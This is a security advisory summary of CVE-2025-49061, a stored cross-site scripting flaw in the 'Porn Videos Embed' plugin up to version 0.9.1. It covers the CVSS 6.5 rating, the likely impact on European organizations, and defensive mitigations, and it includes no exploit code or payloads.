CVE-2025-49061 is a stored Cross-site Scripting (XSS) vulnerability classified under CWE-79, affecting the 'Porn Videos Embed' product developed by perteus, up to version 0.9.1. The vulnerability arises from improper neutralization of input during web page generation, allowing malicious scripts to be stored and subsequently executed in the context of users visiting affected web pages. The CVSS 3.1 base score is 6.5, indicating a medium severity level. The vector details (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L) reveal that the attack can be launched remotely over the network with low attack complexity, requires low privileges, and some user interaction. The scope is changed, meaning the vulnerability affects components beyond the initially vulnerable component. The impact includes limited confidentiality, integrity, and availability losses. Stored XSS vulnerabilities can enable attackers to steal session cookies, perform actions on behalf of users, deface websites, or deliver malware payloads. Since the vulnerability is in a niche product used for embedding pornographic videos, the attack surface is limited to websites employing this specific software. No patches or known exploits are currently available, but the vulnerability is publicly disclosed and could be targeted in the future.

For European organizations, the impact depends largely on whether they operate or host websites using the 'Porn Videos Embed' product. If used, the vulnerability could lead to session hijacking, unauthorized actions by attackers, defacement, or distribution of malicious content to users, potentially damaging reputation and user trust. Given the nature of the product, organizations involved in adult content hosting or affiliate marketing may be most at risk. Additionally, exploitation could lead to indirect impacts such as regulatory scrutiny under GDPR if user data confidentiality is compromised. The medium severity suggests moderate risk, but the potential for scope change and stored XSS means persistent exploitation could affect multiple users and systems. Organizations not using this product are unlikely to be impacted.

Organizations should first identify if they use the 'Porn Videos Embed' product, particularly versions up to 0.9.1. Since no official patches are currently available, immediate mitigations include implementing web application firewalls (WAFs) with rules to detect and block XSS payloads targeting the affected endpoints. Input validation and output encoding should be enforced at the application level to neutralize malicious scripts. Restricting user privileges to the minimum necessary can reduce the risk of exploitation. Monitoring web logs for suspicious input patterns and unusual user behavior can help detect attempted exploitation. Organizations should also follow updates from the vendor or security advisories for patches or fixes. If feasible, consider discontinuing use of the vulnerable product or replacing it with a more secure alternative. Educating users about the risks of clicking on suspicious links and ensuring browsers have XSS protection enabled can provide additional defense layers.